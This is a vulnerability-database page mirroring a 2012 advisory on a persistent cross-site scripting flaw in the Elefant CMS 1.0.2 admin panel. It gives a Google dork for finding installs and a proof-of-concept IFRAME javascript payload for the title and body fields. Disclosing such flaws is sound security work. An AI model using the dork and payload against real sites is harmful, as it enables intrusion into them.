Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Elefant CMS 1.0.2 Cross Site Scripting

🗓️ 01 Mar 2012 00:00:00Reported by Karthik RType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 24 Views

Elefant CMS 1.0.2 Cross Site Scripting vulnerability in admin panel

Code
`  
elefantcms  
vendor: http://www.elefantcms.com  
Version: Latest stable release: 1.0.2  
Author: Karthik R (3psil0nLambDa)  
Email: [email protected]  
My blog: www.epsilonlambda.wordpress.com  
Google dork: Powered by Elefant CMS  
  
------------------------------------------------------------------------------------------------------------------------------------------------------------  
  
Description about the CMS  
  
Elefant is a content management system written in PHP that includes a modern PHP framework for web developers. Elefant is easy-to-use and straight-forward for all levels of users. It is also secure, fast, well-documented, and well-tested.  
  
Elefant's admin tools are minimalist without sacrificing flexibility. We wanted a system that even our moms could use with little or no help, but that power users will enjoy using too. So we made hard choices to keep a lot of needless complexity out.  
  
Instead, we focus on providing a solid editing experience out-of-the-box, well-considered default settings, and just the right set of features to satisfy 90% of the sites we encounter, as opposed to sacrificing simplicity in order to solve every possible edge case.  
  
------------------------------------------------------------------------------------------------------------------------------------------------------------  
* PERSISTENT XSS VULNERABILITY :  
  
In the admin panel, input the TITLE and BODY with the following code, leading to Persistent XSS exploit in the CMS  
  
Exploit: <IFRAME SRC="javascript:alert('XSS');"></IFRAME>  
  
------------------------------------------------------------------------------------------------------------------------------------------------------------  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Mar 2012 00:00Current
0.1Low risk
Vulners AI Score0.1
elefant cmsphp frameworkeasy-to-usesecurefastminimalist admin toolspersistent xss vulnerability
24